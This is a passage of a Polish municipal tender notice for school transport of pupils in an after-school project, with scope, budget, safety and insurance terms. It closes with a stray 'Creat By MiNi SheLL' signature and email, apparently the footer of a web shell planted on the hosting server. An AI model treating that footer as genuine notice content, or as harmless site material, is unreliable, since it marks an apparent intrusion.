5)	Zamawiający informuje, iż wskazanie nazw zwyczajowych czy producentów w zamieszczonych opisach przedmiotu zamówienia służy wyłącznie określeniu cech technicznych i jakościowych.
	Zamawiający dopuszcza możliwość przedstawienia w ofercie towaru równoważnego pod warunkiem, iż oferowany towar będzie o takich samych lub lepszych parametrach technicznych, jakościowych, funkcjonalnych oraz użytkowych. W takim przypadku, Wykonawca zobowiązany jest przedstawić wraz z ofertą jego szczegółową specyfikację, z której w sposób nie budzący żadnej wątpliwości Zamawiającego winno wynikać, iż zaoferowany towar jest o takich samych lub lepszych parametrach technicznych, jakościowych, funkcjonalnych oraz użytkowych w odniesieniu do towaru określonego przez Zamawiającego w opisie przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.20.00-5, 39.16.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dowozy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje w szczególności:
1)	przewóz uczniów (uczestników zajęć pozalekcyjnych w ramach projektu Chcę i potrafię) dojeżdżających do placówek oświatowych na terenie Gminy Rawicz, zgodnie z harmonogramem dla poszczególnych semestrów - harmonogram obowiązujący do końca roku szkolnego 2012/2013 stanowi załącznik nr 4.7 do niniejszej SIWZ, w okresie dwóch lat szkolnych, tj. od dnia podpisania umowy do 30.06.2014 r.  Usługa nie obejmuje okresu ferii zimowych i letnich, oraz dni ustawowo wolnych od nauki, przy czym Zamawiający dopuszcza możliwość realizacji zajęć w dni wolne od nauki, w takim przypadku Wykonawca jest zobowiązany do wykonania usługi dowozu także w te dni, 
2)	przewidywana ilość wozokilometrów - około 250 km tygodniowo,
3)	W cenie 1 wozokilometra, Wykonawca powinien uwzględnić  wszelkie koszty związane z realizacją zamówienia, w tym koszty związane z transportem taboru do miejsca rozpoczęcia i zakończenia  jazdy (przebiegi puste),
4)	Usługi dowozu uczniów będą świadczone zgodnie z ustalonym i zatwierdzonym harmonogramem dla poszczególnych semestrów.  
Zamawiający zastrzega sobie możliwość zmiany harmonogramu (w tym także załączonego harmonogramu na rok szkolny 2012/2013 sem. 1). W takim przypadku Zamawiający w porozumieniu z dyrektorem szkoły poinformuje Wykonawcę o potrzebie wprowadzenia w harmonogramie zmian.   
5)	imienna lista uczniów objętych projektem (z podziałem na poszczególne placówki oświatowe) zostanie podana do wiadomości Wykonawcy przez dyrektorów szkół - przed rozpoczęciem każdego semestru;
6)	rozliczenia będą dokonywane w cyklu miesięcznym na podstawie stawki za 1 wzkm oraz faktycznej ilości przejechanych km, potwierdzonych osobę upoważnioną. Łączna wartość zamówienia nie przekroczy kwoty przeznaczonej na niniejszy zakres w planie finansowym określonym w uchwale budżetowej, tj. kwoty 52 000,00 zł brutto.
7)	Zamawiający zastrzega możliwość odstępstw od podanego harmonogramu przewozów dla poszczególnych semestrów z powodu zmiany planów lekcji, ilości dzieci, likwidacji szkół, zmiany organizacji roku szkolnego, odpracowania dni wolnych, itd.
8)	Wykonawca w ramach niniejszego zamówienia  jest odpowiedzialny za bezpieczeństwo przewożonych dzieci;
9)	Zamawiający wymaga, aby Wykonawca świadczył usługi środkami transportu przystosowanymi do przewozu osób spełniającymi wszystkie wymagania bezpieczeństwa, higieny i kodeksu drogowego, przez osoby mające odpowiednie uprawnienia do świadczenia tych usług. 
10)	W przypadku awarii pojazdu Wykonawca jest zobowiązany do zapewnienia zastępczego środka transportu, w taki sposób aby nie powodował opóźnień czasowych kursu. Wobec powyższego jest zobowiązany posiadać pojazd rezerwowy,
11)	Wykonawca usługi zobowiązany jest do zawarcia umowy ubezpieczeniowej od odpowiedzialności cywilnej oraz następstw nieszczęśliwych wypadków w związku z wykonywaniem przedmiotu umowy (na okres obowiązywania realizacji zamówienia),    
12)	Wszystkie dzieci muszą być przywiezione do szkół najpóźniej na 5 min przed rozpoczęciem zajęć lekcyjnych i nie wcześniej niż 15 minut przed rozpoczęciem zajęć lekcyjnych. 
Godziny dowozu muszą umożliwiać dowożonym uczniom punktualne rozpoczęcie zajęć lekcyjnych. 
13)	Wykonawca przy realizacji usług ponosi koszty szkód wynikłych w czasie wykonywania usług, jak również za odpowiedzialność za wszelkie zdarzenia powstałe z tej przyczyny;
14)	Wybrany Wykonawca przed podpisaniem umowy zobowiązany jest do przedłożenia Zamawiającemu wykazu tras dowozu wraz z liczbą km odpowiednio dla każdej trasy, opracowanego w oparciu o harmonogram zajęć Zamawiającego.  Zamawiający zastrzega sobie możliwość wprowadzenia zmian w przedłożonym wykazie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com